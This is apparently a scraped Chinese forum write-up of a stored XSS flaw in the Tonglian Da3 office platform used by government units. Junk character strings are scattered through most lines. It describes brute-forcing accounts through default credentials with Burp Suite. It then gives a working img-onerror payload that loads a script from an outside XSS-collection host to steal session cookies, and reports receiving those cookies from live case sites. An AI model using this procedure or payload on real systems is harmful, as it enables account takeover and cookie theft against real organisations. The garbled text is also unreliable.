, G1 G' @$ N, t# Z# y. Z+ K
. k( k6 J$ |; [- c' s
同联Da3协同办公平台后台通用储存型xss漏洞& a' f) a$ T3 b0 {: ^( ?
. O# N% b+ c1 D" i* r* L9 n& C
9 [# z: d5 {! e$ K7 ` 平台简介: R! q4 ~+ k) s- U2 F. X
; @2 h, s8 ~( I4 C A) J
7 i' ~- u; k4 a - y9 a+ {8 r$ r4 C- M
0 X' k' J- S1 g
- T" \# n4 S1 e9 K' v
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) o( b! t3 d$ i) }2 V2 }同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' D$ F' q) r, A9 Z
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!" v# D; C; P' ^
$ f; z6 n; a$ R1 j7 i) H5 @/ z v
9 A, s( N E6 v# r
# O5 D9 w& n) g5 Y9 q( ~2 K
( o, ~( }2 X' ~5 t j" H( w
" p0 k T3 y. }' ^( v+ z 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:- |- P- m B6 ]" c' o) b$ V& k
) T* ^1 f* c# t2 [, \6 ~5 f
/ [- M: {9 c) A2 H' \- I % {0 a$ ?5 P5 W6 r1 ]
. J/ u( R* ?1 p9 S " g& A0 J$ e2 c3 V( ~
http://1.1.1.1:7197/cap-aco/#(案例2-)
{' r: A/ |) e$ ]1 S
% A4 x6 Z& p" J3 E- ]; B ; w2 q4 a- y) u9 d# [
http://www.XXOO.com (案例1-官网网站)2 g6 y; U2 A Q& c& M& E% ?1 P
; t! L. C2 X( R
7 R& l' h" B M7 l9 s 漏洞详情:
4 t- R5 G- i# Q7 O
& l. Q) |5 N) f9 w; [& l" {" ^
4 o$ B; F9 l% q2 S5 L! M/ @* R8 @ 案例一、4 Z) V3 v- ?$ ?1 `+ V
5 J, @# r0 C) \4 j6 l 9 x3 [4 p) b3 Q
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试" {) k9 Q& n6 ~- c
* {. f8 M3 }$ ^# {$ ~: b
) m0 a/ H; ]% _2 q9 C* g
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
) Q) F5 r: @0 ~4 C6 }) w8 r$ o7 t
% U3 x! v3 R V( h8 z6 P
0 t$ ]& i2 `: E) ?
+ N+ `; E- q6 H1 B$ y
2 E& _) G5 Z3 n: m* k0 s
5 [$ h& s* b3 ?1 }; E
5 S X9 f5 k" W U V
" m+ A% \/ V/ @& u' R7 V
2 O5 Z r+ f* w; Z5 u status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 0 b- o7 |/ F5 u7 k7 _* m7 G3 ]
( m) O. y# j3 l4 u" K3 D5 t* i/ A E
K4 G( y, Q, I5 a" J6 T
2 g: b+ y( K# }0 ^( D/ p; O
: _$ Q; v+ d; s7 Z
L& g' A3 G- s% W s2 K/ d
5 P G9 _/ b/ ^% E
2 T( ~7 _; m5 v0 w! [! t: d; G
; l0 N6 `$ a S; a 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ; B5 P9 X* ]6 C: \2 y
5 m. Y6 ~$ C) {' J: S& u
6 n! f) N; Q' u8 n
; R/ M% W) x2 l
" |+ e& z& V3 M% T% M2 W: r4 {
& a( b6 u: n3 m
<img src=x( A# Y! K. B+ F2 J
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: / \$ L8 }; ]8 D: F& `3 t4 k$ {
3 p* W$ V S$ z0 N: ~4 N9 C9 ~
3 i+ q5 v* o) c
8 f8 I2 W# Z: E; w2 q
4 u; `& ]! W, i- a# D
- h; C* {" e( L: I$ v& k
然后发送,接收cookie如图: * ^. _% G8 I# X6 R4 Y ?% W
) a* p- o% z2 ~. c1 a5 O/ f+ s
$ s3 |" ?3 ~! F" Q# c# }5 N" F
0 l$ n" V- d' y6 b4 [4 t
0 r0 E# M/ d) u
: x. C l p* h
$ J% @$ i/ c9 R, |3 j- ^3 F. X
, X0 h2 d$ e5 Q& F5 q( P# @+ [
# R" L. p1 s' s* D0 U1 g" l! K7 d
# p, P' i1 k) r' c0 q
1 J$ i L" O" [! Z2 A
# m* Z6 m( Q3 v ]8 m
9 ^: u) O2 K' C& k* F
$ t8 |. A. Z& G/ ^0 |$ i$ e8 q. T
9 O/ D4 ]$ }: a \
R1 ]4 \0 u7 U8 l2 z
) }" u% b% G. Y1 k! x0 R5 x
, e9 V/ V f+ z1 T
* X& ]& w3 I2 K# _. h- N
/ X1 `9 m5 i7 J' k4 E
9 X* V9 j* D# ^" Z1 w! E, d4 Y9 j
3 n9 I* _$ n( u: _. N
0 E# _3 B% b3 k1 X, W) ~ + w* v6 }/ w. _( d8 I
案例2、 + P8 z4 d, ?3 E: s
, U) T; w) Y' {9 X- x
, ]& P3 V$ e. |. @# K3 X 前面步骤都一样,下面看效果图: 5 R* b) p+ y) ]0 c
. b1 @- Y6 z% f6 i$ j
5 r1 |5 R; F* @. _. E5 u% p
0 s1 x# \* k: J
# w& e. N! g3 n: e
: ?& e' j h+ I3 T; a8 ?
9 s0 U: c. V5 q1 N
+ p! p3 a; _* L* s
. y# l( o) L7 h% L }
) B/ v6 @" _1 L. K0 O
. {( x$ W' @. ~3 G
5 Q: d9 \0 }7 ^
}! `' @0 j3 L4 _/ t# V* A2 p
- ~. h& L7 ^' o
F$ M* x& d$ ~* f: H1 ?
& ?( X% P3 T& V1 ?
* V0 g: t. D- g! A( @1 W" D$ S
$ x7 ?& k# c* w3 E, s- S) S" _9 Z $ y4 C5 l7 ]" ~+ ?( {" c5 K9 U
$ y5 ^& K$ Y" r
; K: [ c' K" {8 @) N
& S: s+ k$ z8 k' N% O# x
# }* L) ~/ C* ?8 i/ }5 y7 G) }
* X, n. o7 R$ p. l% N" q
1 n: N9 v- N5 U5 a( ?! J$ @( K4 |
! H; W" ?) W$ F# Q I, a
7 N$ ]) |4 d. p5 z3 i* |/ d: i: }
6 g+ x; E' d# }- @7 w3 P
/ E2 l/ T9 L. w) J: S0 {